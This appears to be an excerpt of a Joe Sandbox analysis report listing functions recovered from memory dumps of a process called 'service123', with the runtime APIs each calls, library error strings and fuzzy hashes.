Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: 5daa2636730e23349a4fa431077554751ac160e6e3c5e26b9d7d812ba38b6b2b
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: F0B01231CDD7288A4430DA7C0510CD0B29EE617348344D883C8CA63D04C312E0279C73

Function 6C3E4AE0 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3EB8AE), ref: 6C3E4B63
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3EB8AE), ref: 6C3E4BA5

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: 394ab26822171714ac9e563cb3e4a9355ac6ee19dfb62a16144abb92127e8a18
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: D26106B4A09712CFC714DF69C58061AFBE0AF88754F10892EE4DA8B760E731E845CF52

Function 6C3E0970 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C3792A3,00000003), ref: 6C3E09ED
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C3792A3,00000003), ref: 6C3E0A2C

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: a74da5437f6ce76cc92ad5748a3207264136ffe127ebf4af10787caa291bb526
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: 8761E1B4509756CFC704DF19C09061AFBE0AF89758F10891EE8EA8B761DB31E845CF92

Function 6C3E2B90 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6C3D736E), ref: 6C3E2C03

Strings

string::string, xrefs: 6C3E2DCE
basic_string::basic_string, xrefs: 6C3E2D0C, 6C3E2D69
basic_string::_M_create, xrefs: 6C3E2C1A, 6C3E2CBA
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3E2D14, 6C3E2D71, 6C3E2DD6

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: 64fe384927a26a85bfcd3095bc7a51e8fa6047ee085b257aa5d72af75d42c001
Instruction ID: b042b07afe889decc853e81b462e1260ecba6e6f37517d2ee9aac0243e850180
Opcode Fuzzy Hash: 64fe384927a26a85bfcd3095bc7a51e8fa6047ee085b257aa5d72af75d42c001
Instruction Fuzzy Hash: EE7173B29093518FC300EF2CD581A4AFBE1BF89218F55C9AED8889B715D376D845CF92

Function 6C34EB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: e2f4f4279292654d0bccbaf9582cffbd916997f1bb079874aa535a0cf93486a6
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: 12619C716093048FD710DF29C480A5AF7E5EF89308F44CA2EE8D99BB54E731D94A8F96

Function 6C35B060 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C35AF3F), ref: 6C415FF0
abort.MSVCRT(?,?,?,?,?,?,6C35AE9C,?,?,?,?,?,?,6C416040), ref: 6C415FF8
abort.MSVCRT(?,?,?,?,?,?,6C35AE9C,?,?,?,?,?,?,6C416040), ref: 6C416000
abort.MSVCRT(?,?,?,?,?,?,6C35AE9C,?,?,?,?,?,?,6C416040), ref: 6C416008

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f453c73bdee96a7010d75185120b65bc6a314601bf543fafb616fbfb3f2569e3
Instruction ID: 1606ce2eb8e7184dfcdcc1330b1531438e40eb32cc9e59de7b537e6ff42ed5d8
Opcode Fuzzy Hash: f453c73bdee96a7010d75185120b65bc6a314601bf543fafb616fbfb3f2569e3
Instruction Fuzzy Hash: 4841BE716093048BCB04EF78C481EFAB7A1EF8221CF54886DD4C48BF15D736945ACBA2

Function 6C341020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C341281,?,?,?,?,?,?,6C3413AE), ref: 6C341057
_amsg_exit.MSVCRT ref: 6C341086

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 1ec6593cb4261c4a5f2f1cf01230a14ef2022df3710094c9c58566df166ffbab
Instruction ID: 709d2d6c1a7fad0f042b06e4da7d4aceafc0eedf1dfc7a01142a410672db615d
Opcode Fuzzy Hash: 1ec6593cb4261c4a5f2f1cf01230a14ef2022df3710094c9c58566df166ffbab
Instruction Fuzzy Hash: B7316DB060D641CBDB00EF2AC581BAAB7F4EB46398F508529D5848BA48D776C494CFE2

Function 6C361F00 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C361F18
strlen.MSVCRT ref: 6C361F22
memcpy.MSVCRT ref: 6C361F3F
setlocale.MSVCRT ref: 6C361F52
wcsftime.MSVCRT ref: 6C361F76
setlocale.MSVCRT ref: 6C361F88

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction ID: ef278fd27d4206bde4c7a835114a00fc5a6371fa92eef426526c9471265f0212
Opcode Fuzzy Hash: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction Fuzzy Hash: D11180B4A09310AFD340AF69C584A5ABBE4BF88654F81882DF4C88B710E7799855CB92

Function 6C361C50 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C361C68
strlen.MSVCRT ref: 6C361C72
memcpy.MSVCRT ref: 6C361C8F
setlocale.MSVCRT ref: 6C361CA2
strftime.MSVCRT ref: 6C361CC6
setlocale.MSVCRT ref: 6C361CD8

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction ID: 6e6001616fbecb50e1031fede5b9f2f99ef70f4f51971c40861493d7d37afe18
Opcode Fuzzy Hash: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction Fuzzy Hash: 6A1192B4509310AFC340AF69C484B5EBBE4BF84654F458C2DF8C987711E779D8558FA2

Function 6C34ED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: 9c529931bdd4985a24234d608b80506fc1a6d7dacf39844aa73dd27510bde1fd
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: C7B092318887A485C420AAAC0010FE6A28E9742348F80480AC1D662C088712A4534966

Function 6C35E0D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C35E117
LocalFree.KERNEL32 ref: 6C35E14B

Strings

basic_string: construction from null is not valid, xrefs: 6C35E1A7
Unknown error code, xrefs: 6C35E18C

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: deade4850c64366031f723a609109357642526651fbd84d4b1452b5108397091
Instruction ID: 0e87d44981d5b1170e3b4cdb9491d522870065b5696021c0fda614298e31da5d
Opcode Fuzzy Hash: deade4850c64366031f723a609109357642526651fbd84d4b1452b5108397091
Instruction Fuzzy Hash: B84147B2A087149BCB00EF69C486AAEFBF4EF85754F40882CE4C49BB10D77495588BD3

Function 6C353659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C353567
fputc.MSVCRT ref: 6C3535D7
memset.MSVCRT ref: 6C353692

Strings

0, xrefs: 6C353687
o, xrefs: 6C35369A

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: fc53a2c5b1d6d24ab20cb9ab697e8be6504cd66c42a871eaa9ae8243ac37e616
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: 40317EB1A093058FCB40CF69C080BAAB7F1BF48314F959A29D995ABB45D339E815CF50

Function 00012F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00012E97
fputc.MSVCRT ref: 00012F07
memset.MSVCRT ref: 00012FC2

Strings

0, xrefs: 00012FB7
o, xrefs: 00012FCA

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: d50c9e3bbe757291edce205beb9ec374ade4f6d3ff43b1d5245bf12e8d20e995
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: 08314671A042098FCB11CF68C0947EEBBF1BF58310F158629D999AB352E738E994CB90

Function 6C349490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C3494C2
strlen.MSVCRT ref: 6C349616

Strings

_GLOBAL_, xrefs: 6C3494B7

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: 828f657b101827e4649a599a0636e60686cd162d8d3717e0fa67bed2f411d5c3
Instruction ID: 89a968064a0a3d0263815fa15a3196aa99ee67436ecd7b04daced237d3ce69f0
Opcode Fuzzy Hash: 828f657b101827e4649a599a0636e60686cd162d8d3717e0fa67bed2f411d5c3
Instruction Fuzzy Hash: A0F17F709053188FEB10CF29C9903DDBBF9AF46308F1481EAC488AB745D7769A89CF91

Function 6C3BDAB0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6C3DF8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3BDA2E), ref: 6C3DF95D
Part of subcall function 6C3DF8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3BDA2E), ref: 6C3DF988

memcpy.MSVCRT ref: 6C3BDCB5

Part of subcall function 6C3E2530: memcpy.MSVCRT(?,-00000001,?,6C36749E,?,?,?,?,?,?,?,?,?,?,?,6C368E25), ref: 6C3E256C

Strings

iostream error, xrefs: 6C3BDD08
basic_string::append, xrefs: 6C3BDDB2, 6C3BDDBE
Unknown error, xrefs: 6C3BDB08

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: 317063ca9b2ed0ab0827532e764fa781198dab963e6a5486735d96cc47bf31d6
Instruction ID: 8d6d0bb8dd096be6b33f7fcc5da4bffce9c07e9c3c434ec1abc6820738eae582
Opcode Fuzzy Hash: 317063ca9b2ed0ab0827532e764fa781198dab963e6a5486735d96cc47bf31d6
Instruction Fuzzy Hash: CDA105B1D043188BCB14DFA8C480A9DFBF5BF58314F24892ED494ABB54D771A845CF92

Function 6C3ABF60 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3AC03F
memcpy.MSVCRT ref: 6C3AC099
memcpy.MSVCRT ref: 6C3AC127

Part of subcall function 6C3AC500: memcpy.MSVCRT ref: 6C3AC58C

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3AC1B3
basic_string::replace, xrefs: 6C3AC194, 6C3AC1A7

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 9487297eedc5dae270d2aab60c5e584f33a4d4c11df6276af19ab1ce505367e5
Instruction ID: 63b49e2accb22edfd291f0764f561f83d8bd3b64144b206f15a14020d2a90d11
Opcode Fuzzy Hash: 9487297eedc5dae270d2aab60c5e584f33a4d4c11df6276af19ab1ce505367e5
Instruction Fuzzy Hash: 4C814871A052159FCB00EF69D48099EBBF1FF88718F11892DE89887710D732D966CF92

Function 6C3B5000 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3B50D0
memcpy.MSVCRT ref: 6C3B5124
memcpy.MSVCRT ref: 6C3B51B8

Part of subcall function 6C3B5590: memcpy.MSVCRT ref: 6C3B5620

Strings

basic_string::replace, xrefs: 6C3B5229, 6C3B523C
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3B5248

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: b75fbad834c34e93c3d29792e39d8f223198f72f27d574c6e06b23b1373c7878
Instruction ID: 797e79686d7afe2e11a756c5f44390d4cbaea976d0d434bad6828ca9b5155b15
Opcode Fuzzy Hash: b75fbad834c34e93c3d29792e39d8f223198f72f27d574c6e06b23b1373c7878
Instruction Fuzzy Hash: 6C813575A093059FCB00DF68C880A9EBBF5AF99254F50892EE899E7B10D731D9448F92

Function 6C3BD810 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3DF8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3BDA2E), ref: 6C3DF95D
Part of subcall function 6C3DF8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C3BDA2E), ref: 6C3DF988

strlen.MSVCRT ref: 6C3BD8E5
memcpy.MSVCRT ref: 6C3BD9BE

Strings

iostream error, xrefs: 6C3BDA12
Unknown error, xrefs: 6C3BD85E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

